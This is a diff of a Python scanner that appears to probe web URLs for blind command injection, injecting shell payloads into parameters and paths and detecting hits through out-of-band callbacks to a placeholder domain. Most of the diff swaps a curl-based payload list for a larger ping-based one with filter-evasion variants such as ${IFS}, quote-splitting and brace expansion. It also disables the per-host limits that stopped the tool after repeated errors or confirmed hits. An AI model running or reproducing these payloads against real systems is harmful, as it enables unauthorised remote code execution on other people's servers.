| skipped 17 lines |
18 | 18 | | from multiprocessing.dummy import Pool |
19 | 19 | | from colored import fg, bg, attr |
20 | 20 | | |
21 | | - | MAX_EXCEPTION = 3 |
22 | | - | MAX_VULNERABLE = 3 |
| 21 | + | MAX_EXCEPTION = 100 |
| 22 | + | MAX_VULNERABLE = 100 |
23 | 23 | | |
24 | 24 | | # disable "InsecureRequestWarning: Unverified HTTPS request is being made." |
25 | 25 | | from requests.packages.urllib3.exceptions import InsecureRequestWarning |
| skipped 93 lines |
119 | 119 | | if len(t_urlparse.query): |
120 | 120 | | testParams( t_urlparse, payload.strip('/') ) |
121 | 121 | | |
122 | | - | if len(t_urlparse.fragment): |
123 | | - | testFragment( t_urlparse, payload.strip('/') ) |
| 122 | + | # if len(t_urlparse.fragment): |
| 123 | + | # testFragment( t_urlparse, payload.strip('/') ) |
124 | 124 | | |
125 | 125 | | testPath( t_urlparse, payload ) |
126 | 126 | | |
| skipped 13 lines |
140 | 140 | | |
141 | 141 | | def doTest( url, method='GET', post_params='' ): |
142 | 142 | | |
143 | | - | t_realdotest.append( [url,method,post_params] ) |
| 143 | + | realDoTest( [url,method,post_params] ) |
| 144 | + | # t_realdotest.append( [url,method,post_params] ) |
144 | 145 | | return |
145 | 146 | | |
146 | 147 | | |
| skipped 10 lines |
157 | 158 | | t_urlparse = urllib.parse.urlparse(url) |
158 | 159 | | u = t_urlparse.scheme + '_' + t_urlparse.netloc |
159 | 160 | | |
160 | | - | if not u in t_exceptions: |
161 | | - | t_exceptions[u] = 0 |
162 | | - | if t_exceptions[u] >= MAX_EXCEPTION: |
163 | | - | if _verbose >= 3 and _verbose < 4: |
164 | | - | print("skip too many exceptions %s" % t_urlparse.netloc) |
165 | | - | return |
| 161 | + | # if not u in t_exceptions: |
| 162 | + | # t_exceptions[u] = 0 |
| 163 | + | # if t_exceptions[u] >= MAX_EXCEPTION: |
| 164 | + | # if _verbose >= 3 and _verbose < 4: |
| 165 | + | # print("skip too many exceptions %s" % t_urlparse.netloc) |
| 166 | + | # return |
166 | 167 | | |
167 | | - | if not u in t_vulnerable: |
168 | | - | t_vulnerable[u] = 0 |
169 | | - | if t_vulnerable[u] >= MAX_VULNERABLE: |
170 | | - | if _verbose >= 3 and _verbose < 4: |
171 | | - | print("skip already vulnerable %s" % t_urlparse.netloc) |
172 | | - | return |
| 168 | + | # if not u in t_vulnerable: |
| 169 | + | # t_vulnerable[u] = 0 |
| 170 | + | # if t_vulnerable[u] >= MAX_VULNERABLE: |
| 171 | + | # if _verbose >= 3 and _verbose < 4: |
| 172 | + | # print("skip already vulnerable %s" % t_urlparse.netloc) |
| 173 | + | # return |
173 | 174 | | |
174 | 175 | | try: |
175 | 176 | | if method == 'POST': |
| skipped 1 lines |
177 | 178 | | else: |
178 | 179 | | r = requests.head( url, headers=t_custom_headers, timeout=5, verify=False ) |
179 | 180 | | except Exception as e: |
180 | | - | t_exceptions[u] = t_exceptions[u] + 1 |
| 181 | + | # t_exceptions[u] = t_exceptions[u] + 1 |
181 | 182 | | if _verbose >= 3 and _verbose < 4: |
182 | 183 | | sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) ) |
183 | 184 | | return |
| skipped 137 lines |
321 | 322 | | |
322 | 323 | | if not n_payloads: |
323 | 324 | | t_payloads = [ |
324 | | - | '%0Acurl%20rce___RANDOM_STR__.__DOMAIN__', |
325 | | - | '%0Acurl%20rce___RANDOM_STR__.__DOMAIN__', |
326 | | - | '%0a%20curl%20rce___RANDOM_STR__.__DOMAIN__%20%0a', |
327 | | - | '%0Acurl%20rce___RANDOM_STR__.__DOMAIN__%0A', |
328 | | - | '|curl%20rce___RANDOM_STR__.__DOMAIN__', |
329 | | - | ';curl%20rce___RANDOM_STR__.__DOMAIN__', |
330 | | - | ';curl%20rce___RANDOM_STR__.__DOMAIN__|', |
331 | | - | ';curl%20rce___RANDOM_STR__.__DOMAIN__;', |
332 | | - | ';curl$IFSrce___RANDOM_STR__.__DOMAIN__;', |
333 | | - | ')|curl%20rce___RANDOM_STR__.__DOMAIN__', |
334 | | - | ')|curl%20rce___RANDOM_STR__.__DOMAIN__;', |
335 | | - | ');curl%20rce___RANDOM_STR__.__DOMAIN__', |
336 | | - | ');curl%20rce___RANDOM_STR__.__DOMAIN__|', |
337 | | - | ');curl%20rce___RANDOM_STR__.__DOMAIN__;', |
338 | | - | '`curl%20rce___RANDOM_STR__.__DOMAIN__`', |
339 | | - | '||curl%20rce___RANDOM_STR__.__DOMAIN__|', |
340 | | - | '||curl%20rce___RANDOM_STR__.__DOMAIN__;', |
341 | | - | '||curl$IFSrce___RANDOM_STR__.__DOMAIN__;', |
342 | | - | '|%20curl%20rce___RANDOM_STR__.__DOMAIN__', |
343 | | - | '|curl%20rce___RANDOM_STR__.__DOMAIN__', |
344 | | - | '|curl%20rce___RANDOM_STR__.__DOMAIN__|', |
345 | | - | '|curl%20rce___RANDOM_STR__.__DOMAIN__;', |
346 | | - | ';|curl%20rce___RANDOM_STR__.__DOMAIN__|', |
347 | | - | ';%20curl%20rce___RANDOM_STR__.__DOMAIN__', |
348 | | - | ';curl%20rce___RANDOM_STR__.__DOMAIN__', |
349 | | - | ';curl%20rce___RANDOM_STR__.__DOMAIN__|', |
350 | | - | ';curl%20rce___RANDOM_STR__.__DOMAIN__;', |
351 | | - | '$;curl%20rce___RANDOM_STR__.__DOMAIN__', |
352 | | - | '$(curl%20rce___RANDOM_STR__.__DOMAIN__)', |
353 | | - | '&%20curl%20rce___RANDOM_STR__.__DOMAIN__', |
354 | | - | '%26%20curl%20rce___RANDOM_STR__.__DOMAIN__%20%26', |
355 | | - | ';curl%20rce___RANDOM_STR__.__DOMAIN__\n', |
356 | | - | '\ncurl%20rce___RANDOM_STR__.__DOMAIN__|', |
357 | | - | '\ncurl%20rce___RANDOM_STR__.__DOMAIN__;', |
358 | | - | '|ncurl%20rce___RANDOM_STR__.__DOMAIN__\n', |
359 | | - | '\ncurl%20rce___RANDOM_STR__.__DOMAIN__\n', |
360 | | - | ';system(\'curl%20rce___RANDOM_STR__.__DOMAIN__\')', |
361 | | - | ';exec(\'curl%20rce___RANDOM_STR__.__DOMAIN__\')', |
362 | | - | '|curl%20rce___RANDOM_STR__.__DOMAIN__\n', |
363 | | - | '`curl%20rce___RANDOM_STR__.__DOMAIN__`', |
364 | | - | '%0acurl%20rce___RANDOM_STR__.__DOMAIN__%0a', |
| 325 | + | 'rce___RANDOM_STR__.__DOMAIN__', |
| 326 | + | '$;ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 327 | + | '%0Aping%20rce___RANDOM_STR__.__DOMAIN__%0A', |
| 328 | + | '%0Aping%20rce___RANDOM_STR__.__DOMAIN__', |
| 329 | + | '%0a%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%0a', |
| 330 | + | '%0aping%20rce___RANDOM_STR__.__DOMAIN__%0a', |
| 331 | + | '%26%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%26', |
| 332 | + | '%26%26%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%26%26', |
| 333 | + | '&%20ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 334 | + | ');ping${IFS}rce___RANDOM_STR__.__DOMAIN__', |
| 335 | + | ');ping<rce___RANDOM_STR__.__DOMAIN__', |
| 336 | + | ");p'i'n'g'${IFS}rce___RANDOM_STR__.__DOMAIN__%23", |
| 337 | + | ');p"i"n"g%20rce___RANDOM_STR__.__DOMAIN__%23', |
| 338 | + | ');{p\i\n\g,rce___RANDOM_STR__.__DOMAIN__}%23', |
| 339 | + | ');{ping,rce___RANDOM_STR__.__DOMAIN__}', |
| 340 | + | ');ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 341 | + | ');ping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 342 | + | ');ping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 343 | + | ')|ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 344 | + | ')|ping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 345 | + | ';{ping;rce___RANDOM_STR__.__DOMAIN__}', |
| 346 | + | ';exec(\'ping%20rce___RANDOM_STR__.__DOMAIN__\')', |
| 347 | + | ';ping${IFS}rce___RANDOM_STR__.__DOMAIN__;', |
| 348 | + | ';ping<rce___RANDOM_STR__.__DOMAIN__;', |
| 349 | + | ';p\i\n\g%20rce___RANDOM_STR__.__DOMAIN__;', |
| 350 | + | ';{ping,rce___RANDOM_STR__.__DOMAIN__};', |
| 351 | + | ';ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 352 | + | ';ping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 353 | + | ";p'i'n'g%20rce___RANDOM_STR__.__DOMAIN__;", |
| 354 | + | ';p"i"n"g%20rce___RANDOM_STR__.__DOMAIN__;', |
| 355 | + | ';p\i\n\g%20rce___RANDOM_STR__.__DOMAIN__;', |
| 356 | + | ';p$@in$@g%20rce___RANDOM_STR__.__DOMAIN__;', |
| 357 | + | ';p$()in$()g%20rce___RANDOM_STR__.__DOMAIN__;', |
| 358 | + | ';ping%20rce___RANDOM_STR__.__DOMAIN__\n', |
| 359 | + | ';ping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 360 | + | ';system(\'ping%20rce___RANDOM_STR__.__DOMAIN__\')', |
| 361 | + | ';|ping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 362 | + | '\nping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 363 | + | '\nping%20rce___RANDOM_STR__.__DOMAIN__\n', |
| 364 | + | '\nping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 365 | + | '`ping%20rce___RANDOM_STR__.__DOMAIN__`', |
| 366 | + | '|%20ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 367 | + | '|\nping%20rce___RANDOM_STR__.__DOMAIN__\n', |
| 368 | + | '|ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 369 | + | '|ping${IFS}rce___RANDOM_STR__.__DOMAIN__;', |
| 370 | + | '|ping<rce___RANDOM_STR__.__DOMAIN__;', |
| 371 | + | '|{ping,rce___RANDOM_STR__.__DOMAIN__};', |
| 372 | + | '|ping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 373 | + | '|ping%20rce___RANDOM_STR__.__DOMAIN__\n', |
| 374 | + | '|ping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 375 | + | '||ping$IFSrce___RANDOM_STR__.__DOMAIN__;', |
| 376 | + | '||ping<rce___RANDOM_STR__.__DOMAIN__;', |
| 377 | + | '||{ping,rce___RANDOM_STR__.__DOMAIN__};', |
| 378 | + | '||ping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 379 | + | '||ping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 380 | + | "||p'i'n'g%20rce___RANDOM_STR__.__DOMAIN__%23", |
| 381 | + | '||p"i"n"g%20rce___RANDOM_STR__.__DOMAIN__%23', |
| 382 | + | '||p\i\n\g%20rce___RANDOM_STR__.__DOMAIN__%23', |
| 383 | + | '||p$@in$@g%20rce___RANDOM_STR__.__DOMAIN__%23', |
| 384 | + | '||p$()in$()g%20rce___RANDOM_STR__.__DOMAIN__%23', |
| 385 | + | |
| 386 | + | # '%0Aping%20rce___RANDOM_STR__.__DOMAIN__', |
| 387 | + | # '%0Aping%20rce___RANDOM_STR__.__DOMAIN__', |
| 388 | + | # '%0a%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%0a', |
| 389 | + | # '%0Aping%20rce___RANDOM_STR__.__DOMAIN__%0A', |
| 390 | + | # '|ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 391 | + | # ';ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 392 | + | # ';ping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 393 | + | # ';ping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 394 | + | # ';ping$IFSrce___RANDOM_STR__.__DOMAIN__;', |
| 395 | + | # ')|ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 396 | + | # ')|ping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 397 | + | # ');ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 398 | + | # ');ping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 399 | + | # ');ping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 400 | + | # '`ping%20rce___RANDOM_STR__.__DOMAIN__`', |
| 401 | + | # '||ping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 402 | + | # '||ping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 403 | + | # '||ping$IFSrce___RANDOM_STR__.__DOMAIN__;', |
| 404 | + | # '|%20ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 405 | + | # '|ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 406 | + | # '|ping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 407 | + | # '|ping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 408 | + | # ';|ping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 409 | + | # ';%20ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 410 | + | # ';ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 411 | + | # ';ping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 412 | + | # ';ping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 413 | + | # '$;ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 414 | + | # '$(ping%20rce___RANDOM_STR__.__DOMAIN__)', |
| 415 | + | # '&%20ping%20rce___RANDOM_STR__.__DOMAIN__', |
| 416 | + | # '%26%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%26', |
| 417 | + | # '%26%26%20ping%20rce___RANDOM_STR__.__DOMAIN__%20%26%26', |
| 418 | + | # ';ping%20rce___RANDOM_STR__.__DOMAIN__\n', |
| 419 | + | # '\nping%20rce___RANDOM_STR__.__DOMAIN__|', |
| 420 | + | # '\nping%20rce___RANDOM_STR__.__DOMAIN__;', |
| 421 | + | # '|nping%20rce___RANDOM_STR__.__DOMAIN__\n', |
| 422 | + | # '\nping%20rce___RANDOM_STR__.__DOMAIN__\n', |
| 423 | + | # ';system(\'ping%20rce___RANDOM_STR__.__DOMAIN__\')', |
| 424 | + | # ';exec(\'ping%20rce___RANDOM_STR__.__DOMAIN__\')', |
| 425 | + | # '|ping%20rce___RANDOM_STR__.__DOMAIN__\n', |
| 426 | + | # '`ping%20rce___RANDOM_STR__.__DOMAIN__`', |
| 427 | + | # '%0aping%20rce___RANDOM_STR__.__DOMAIN__%0a', |
365 | 428 | | ] |
366 | 429 | | |
367 | 430 | | for i,payload in enumerate(t_payloads): |
| skipped 42 lines |
410 | 473 | | sys.stdout.write( '[+] testing...\n' ) |
411 | 474 | | |
412 | 475 | | |
413 | | - | random.shuffle(t_totest) |
| 476 | + | # random.shuffle(t_totest) |
414 | 477 | | # print("\n".join(t_totest)) |
415 | 478 | | # exit() |
416 | 479 | | |
| skipped 31 lines |
448 | 511 | | |
449 | 512 | | |
450 | 513 | | |
451 | | - | t_exceptions = {} |
452 | | - | t_vulnerable = {} |
453 | | - | t_multiproc = { |
454 | | - | 'n_current': 0, |
455 | | - | 'n_total': len(t_realdotest), |
456 | | - | 'u_max_length': u_max_length+5, |
457 | | - | 'd_output': d_output, |
458 | | - | 'f_output': f_output, |
459 | | - | } |
| 514 | + | # t_exceptions = {} |
| 515 | + | # t_vulnerable = {} |
| 516 | + | # t_multiproc = { |
| 517 | + | # 'n_current': 0, |
| 518 | + | # 'n_total': len(t_realdotest), |
| 519 | + | # 'u_max_length': u_max_length+5, |
| 520 | + | # 'd_output': d_output, |
| 521 | + | # 'f_output': f_output, |
| 522 | + | # } |
460 | 523 | | |
461 | | - | def realDoWork(): |
462 | | - | while True: |
463 | | - | params = q.get() |
464 | | - | realDoTest( params ) |
465 | | - | q.task_done() |
| 524 | + | # def realDoWork(): |
| 525 | + | # while True: |
| 526 | + | # params = q.get() |
| 527 | + | # realDoTest( params ) |
| 528 | + | # q.task_done() |
466 | 529 | | |
467 | | - | q = Queue( _threads*2 ) |
| 530 | + | # q = Queue( _threads*2 ) |
468 | 531 | | |
469 | | - | for i in range(_threads): |
470 | | - | t = Thread( target=realDoWork ) |
471 | | - | t.daemon = True |
472 | | - | t.start() |
| 532 | + | # for i in range(_threads): |
| 533 | + | # t = Thread( target=realDoWork ) |
| 534 | + | # t.daemon = True |
| 535 | + | # t.start() |
473 | 536 | | |
474 | | - | try: |
475 | | - | for url in t_realdotest: |
476 | | - | q.put( url ) |
477 | | - | q.join() |
478 | | - | except KeyboardInterrupt: |
479 | | - | sys.exit(1) |
| 537 | + | # try: |
| 538 | + | # for url in t_realdotest: |
| 539 | + | # q.put( url ) |
| 540 | + | # q.join() |
| 541 | + | # except KeyboardInterrupt: |
| 542 | + | # sys.exit(1) |
480 | 543 | | |
481 | 544 | | |
482 | 545 | | |
| skipped 1 lines |